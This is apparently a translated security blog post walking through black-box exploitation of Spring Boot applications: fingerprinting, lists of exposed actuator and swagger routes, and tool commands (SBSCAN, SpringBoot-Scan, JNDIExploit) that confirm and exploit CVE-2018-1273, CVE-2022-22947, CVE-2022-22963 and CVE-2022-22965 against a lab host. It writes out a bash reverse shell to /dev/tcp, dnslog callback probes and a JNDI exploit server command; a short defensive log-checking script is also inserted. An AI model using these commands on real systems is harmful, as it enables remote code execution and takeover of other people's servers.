SpringBoot Vulnerability Exploitation (CVE)

0x00 Preface

Spring is a lightweight open-source framework for Java EE development, and Spring Boot is a newer Java framework that builds on Spring and streamlines its configuration.

In day-to-day engagements we often run into websites built on the Spring Boot framework. This post collects the common ways this framework gets exploited. All vulnerability environments in this article were built locally by the author.

This article focuses on how to discover and exploit vulnerabilities from a black box perspective.

0x01 Framework Characteristics

1. Manual identification

1. The site's favicon is a green leaf (the Spring logo).
2. A distinctive error message.
3. The "Whitelabel Error Page" keyword.

2. Tool identification

Set up a Spring Boot target on a VPS as a lab, then identify it with:

awvs

goby

0x02 Information leakage

Routing knowledge

The default base path of the built-in routes in Spring Boot Actuator 1.x is /, while 2.x uses /actuator as the base path.
Actuator's default built-in route names, such as /env, are sometimes renamed by developers, for example to /appenv.

1. Leakage of routing address and interface call details

Developers either did not realise that leaking these addresses creates a security risk, or, when the development environment was promoted to production, nobody changed the configuration file or forgot to switch the environment configuration, and so on.

Request the following two swagger-related routes directly to check whether the issue exists:

/v2/api-docs
/swagger-ui.html

Other related interface routes you may come across, from swagger, swagger-codegen, swagger-dubbo, etc.:

/swagger
/api-docs
/api.html
/swagger-ui
/swagger/codes
/api/index.html
/api/v2/api-docs
/v2/swagger.json
/swagger-ui/html
/distv2/index.html
/swagger/index.html
/sw/swagger-ui.html
/api/swagger-ui.html
/static/swagger.json
/user/swagger-ui.html
/swagger-ui/index.html
/swagger-dubbo/api-docs
/template/swagger-ui.html
/swagger/static/index.html
/dubbo-provider/distv2/index.html
/spring-security-rest/api/swagger-ui.html
/spring-security-oauth-resource/swagger-ui.html

In addition, the following Spring Boot Actuator routes sometimes contain (or let you infer) interface address information, although parameter details cannot be obtained from them:

/mappings
/metrics
/beans
/configprops
/actuator/metrics
/actuator/mappings
/actuator/beans
/actuator/configprops

Generally speaking, exposing a Spring Boot application's interface and parameter information is not considered a vulnerability in itself, but from a "secure by default" standpoint it is safer not to expose it.

Attackers will generally audit the exposed interfaces carefully to build up their understanding of the business system, and will also check the application for broken access control (privilege escalation), unauthenticated access, and other business-logic vulnerabilities.

2. Routes exposed due to improper configuration

This mainly happens because developers did not realise during development that exposing routes creates a security risk, or did not follow standard procedure and forgot to modify/switch the production configuration at release time.

Default built-in routes exposed due to improper configuration may include:

/actuator
/auditevents
/autoconfig
/beans
/caches
/conditions
/configprops
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/integrationgraph
/jolokia
/logfile
/loggers
/liquibase
/metrics
/mappings
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream

Among them, the interfaces that matter most for finding vulnerabilities are:

/env, /actuator/env

A GET request to /env directly leaks environment variables, intranet addresses, usernames from the configuration, and so on; when the developer's property names are non-standard, for example password spelled psasword or abbreviated to pwd, the password is leaked in plaintext, because Actuator only masks properties whose keys look like secrets.

In addition, some properties can sometimes be set through a POST request to /env, which indirectly triggers the related RCE vulnerabilities; there is also a chance of recovering the plaintext of sensitive values such as passwords and keys that are masked with asterisks.

/refresh, /actuator/refresh

After setting properties through POST /env, a POST request to /refresh reloads the property values and can trigger the related RCE vulnerabilities.

/restart, /actuator/restart

This interface is rarely exposed; properties can be set via POST /env and the application then restarted via POST /restart to trigger the related RCE vulnerabilities.

/jolokia, /actuator/jolokia

The /jolokia/list interface can be used to find exploitable MBeans, indirectly trigger the related RCE vulnerabilities, recover the plaintext of sensitive values masked with asterisks, and so on.

/trace, /actuator/httptrace

Access-tracing records of recent HTTP requests; these may reveal request details of intranet application systems, as well as cookies, JWT tokens and similar credentials of valid users or administrators.
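As an added defender-side example (not from the article or any of the tools it mentions): a small Python checker that runs over constructed access-log lines, maps both 1.x (/env) and 2.x (/actuator/env) paths, including renamed routes like /appenv, to the endpoints listed above, and escalates when the same client writes through POST /env and then calls POST /refresh or /restart, the chain this section describes. The combined-log format and the sample lines are assumptions.

```python
import re
# Added example, not from the article: the actuator endpoints it singles out.
READ_SENSITIVE = {"env", "heapdump", "jolokia", "trace", "httptrace", "mappings",
                  "configprops", "beans", "dump", "threaddump", "logfile", "sessions"}
WRITE_SENSITIVE = {"env", "refresh", "restart", "shutdown", "jolokia", "loggers"}
SENSITIVE = READ_SENSITIVE | WRITE_SENSITIVE
# Combined-log-format access line (assumed format): client, method, path, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def actuator_name(path):
    # /env, /actuator/env, /jolokia/list and renamed routes like /appenv (name kept as suffix)
    segs = [s for s in path.split("?", 1)[0].split("/") if s]
    if segs and segs[0] == "actuator":
        segs = segs[1:]
    head = segs[0] if segs else ""
    for name in sorted(SENSITIVE, key=len, reverse=True):   # longest name wins (heapdump > dump)
        if head.endswith(name):
            return name
    return None

def analyze(lines):
    # Yields (client, severity, detail) for successful hits on sensitive endpoints; a client
    # that writes a property via POST /env and then POSTs /refresh or /restart is critical.
    alerts, env_writers = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m.group("ip", "method", "path", "status")
        name = actuator_name(path)
        if name is None or status != "200":    # 401/404 means the route is not exposed
            continue
        if method == "POST" and name in WRITE_SENSITIVE:
            sev = "critical" if name in ("refresh", "restart") and ip in env_writers else "high"
            if name == "env":
                env_writers.add(ip)
            alerts.append((ip, sev, f"POST {path}" + (" after /env write: possible RCE chain" if sev == "critical" else "")))
        else:
            alerts.append((ip, "medium", f"{method} {path} exposes {name}"))
    return alerts

# Constructed sample access log (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:10:00:01 +0000] "GET /actuator/env HTTP/1.1" 200 5678
198.51.100.4 - - [10/Oct/2023:10:00:02 +0000] "GET /jolokia/list HTTP/1.1" 200 9012
203.0.113.7 - - [10/Oct/2023:10:00:03 +0000] "POST /env HTTP/1.1" 200 12
203.0.113.7 - - [10/Oct/2023:10:00:04 +0000] "POST /refresh HTTP/1.1" 200 20
198.51.100.4 - - [10/Oct/2023:10:00:05 +0000] "GET /appenv HTTP/1.1" 401 0
"""
```

Running analyze(SAMPLE_LOG.splitlines()) gives four alerts, the last one critical for 203.0.113.7; the 401 on /appenv is ignored because the route is not actually exposed.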

0x03 CVE-2018-1273 (no echo)

The environment here is an internet-facing lab built with a VPS + vulhub.

From a black-box perspective I only know that the target uses the Spring Boot framework and nothing else.

Vulnerability detection

The SBSCAN scanner is recommended (it supports both sensitive-directory and vulnerability detection).
Tool reference:
https://blog.csdn.net/m0_60571842/article/details/133694136

python sbscan.py -u http://114.132.219.55:8080/ -ff -q

python sbscan.py -u http://114.132.219.55:8080/ -ff -q -d xdxhf5.dnslog.cn

Vulnerability confirmed!!!
The tool also supports a proxy option; if you want to see the packets used for the vulnerability test, forward the requests to Burp Suite (BP):

python sbscan.py -u http://114.132.219.55:8080/ -ff -q -d xdxhf5.dnslog.cn -p 127.0.0.1:8080

0x04 CVE-2022-22947

The environment here is an internet-facing lab built with a VPS + vulhub.

Again, I only know that the target uses the Spring Boot framework and nothing else.

Vulnerability detection

The SBSCAN tool is recommended.
Tool reference:
https://blog.csdn.net/m0_60571842/article/details/133694136

python sbscan.py -u http://114.132.219.55:8080/ -q

Look at the results report:

You can see that some route addresses were leaked and the id command was executed.

Exploitation

If the target was confirmed vulnerable in the detection step above, this step is simple: just exploit it.

1. GOBY

Here the community edition of goby can be used directly to scan, and after scanning you can verify the result online.


2. Spring_All_Reachable

Tool reference:
https://blog.csdn.net/m0_60571842/article/details/132226378

3. SpringBootExploit

Tool reference:
https://blog.csdn.net/m0_60571842/article/details/132271900

Run the JNDIExploit tool on the VPS:

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 114.132.219.55

Follow the prompts and access http://114.132.219.55:8080/?cmd=id

4. SpringBoot-Scan-GUI

Tool reference:
https://blog.csdn.net/m0_60571842/article/details/132269211

Usage is very simple: just double-click to open the exe.

This way you have to click the Exploit button again every time you change the command, which is a bit inconvenient; you can try a reverse shell instead.

Recommended reverse shell command generator:
https://forum.ywhack.com/shell.php

Listen on the corresponding port on the VPS.

5. SpringBoot-Scan

Tool reference:
https://blog.csdn.net/m0_60571842/article/details/132269014

python3 SpringBoot-Scan.py -v example.com

For CVE-2022-22947 this tool currently does not support interactive commands; it can only execute id.

0x05 CVE-2022-22963 (no echo)

The environment here is an internet-facing lab built with a VPS + vulhub.

The "Whitelabel Error Page" keyword shows that the Spring Boot framework is in use.

Vulnerability detection and exploitation

1. SBSCAN

Tool reference:
https://blog.csdn.net/m0_60571842/article/details/133694136

python sbscan.py -u http://114.132.219.55:8080/ -ff -q

python sbscan.py -u http://114.132.219.55:8080/ -ff -q -d 2l9lgj.dnslog.cn

Check whether dnslog has a record.

There is a record, so the vulnerability is confirmed!!!

How to get a reverse shell?

Again, route the tool's requests through Burp Suite (BP) and just modify the test command.

python3 sbscan.py -u http://114.132.219.55:8080/ -ff -q -p 127.0.0.1:8080

Recommended reverse shell command generator:
https://ares-x.com/tools/runtime-exec

Content to encode → bash -i >& /dev/tcp/192.168.0.105/8888 0>&1

Listen on the corresponding port on the VPS.

2. SpringBoot-Scan

Tool reference:
https://blog.csdn.net/m0_60571842/article/details/132269014

python3 SpringBoot-Scan.py -v example.com

This tool supports a proxy option, so getting a reverse shell manually is very simple: route the tool's requests through Burp Suite (BP), then modify the test payload in BP.

python3 SpringBoot-Scan.py -v http://114.132.219.55:8080/ -p 127.0.0.1:8080

Isn't it enough to just replace whoami with a reverse shell command?

3. SpringBoot-Scan-GUI

Tool reference:
https://blog.csdn.net/m0_60571842/article/details/132269211

Usage is very simple: just double-click to open the exe.

Recommended reverse shell command generator:
https://ares-x.com/tools/runtime-exec

Content to encode → bash -i >& /dev/tcp/192.168.0.105/8888 0>&1

Listen on the corresponding port on the VPS.

4. Spring_All_Reachable

Tool reference:
https://blog.csdn.net/m0_60571842/article/details/132226378

Recommended reverse shell command generator:
https://forum.ywhack.com/shell.php

0x06 CVE-2022-22965

The environment here is an internet-facing lab built with a VPS + vulhub.

The green-leaf favicon shows that the Spring Boot framework is in use.

Vulnerability detection and exploitation

1. SBSCAN

Tool reference:
https://blog.csdn.net/m0_60571842/article/details/133694136

python3 sbscan.py -u http://114.132.219.55:8080/ -q

View the vulnerability report:

The command executed successfully.

2. SpringBoot-Scan-GUI

Tool reference:
https://blog.csdn.net/m0_60571842/article/details/132269211

Usage is very simple: just double-click to open the exe.

It didn't show up in the scan? Don't worry.


3. SpringBoot-Scan

Tool reference:
https://blog.csdn.net/m0_60571842/article/details/132269014

python3 SpringBoot-Scan.py -v example.com

For this CVE the tool supports interactive command execution.